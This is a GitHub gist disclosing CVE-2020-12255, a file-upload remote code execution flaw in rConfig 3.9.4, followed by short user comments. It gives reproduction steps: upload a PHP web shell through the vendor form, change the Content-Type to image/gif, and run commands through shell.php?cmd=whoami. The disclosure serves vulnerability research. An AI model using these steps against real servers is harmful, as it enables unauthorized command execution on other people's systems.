Skip to content

Instantly share code, notes, and snippets.

@farid007
Last active November 15, 2022 06:17
  • Star 5 You must be signed in to star a gist
  • Fork 2 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save farid007/9f6ad063645d5b1550298c8b9ae953ff to your computer and use it in GitHub Desktop.
Rconfig 3.9.4 File Upload RCE
Remote Code Execution via File Upload (CVE-2020-12255)
The rConfig 3.9.4 is vulnerable to remote code execution due to improper checks/validation via the file upload functionality.
The vendor.crud.php accepts the file upload by checking through content-type and it is not restricting upload by checking the file extension and header.
Due to this flaw, An attacker can exploit this vulnerability by uploading a PHP file that contains arbitrary code (shell) and changing the content-type to `image/gif` in the vendor.crud.php.
since the validation checks are happening through content-type the server would accept the PHP file uploaded ultimately resulting code execution upon the response when invoked.
Steps To Reproduce-:
1. Login to the application.
2. Go to https://ip-rconfig/vendors.php and click on ‘Add Vendor’.
3. Click on the browse, upload PHP file that contains backdoor or shell and Intercept the request using burp suite.
4. Now Change the `Content-Type` to `image/gif`.
5. Go to https://ip-rconfig/images/vendor/shell.php?cmd=whoami
Note:- shell.php is a uploaded file
@F-Masood
Copy link

F-Masood commented May 8, 2021

@zztczcx
Copy link

zztczcx commented May 9, 2021

Good, it works

@F-Masood
Copy link

̿̿ ̿̿ ̿̿ ̿'̿'\̵͇̿̿\з= ( ▀ ͜͞ʖ▀) =ε/̵͇̿̿/’̿’̿ ̿ ̿̿ ̿̿ ̿̿

@Steiner-254
Copy link

Interesting!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment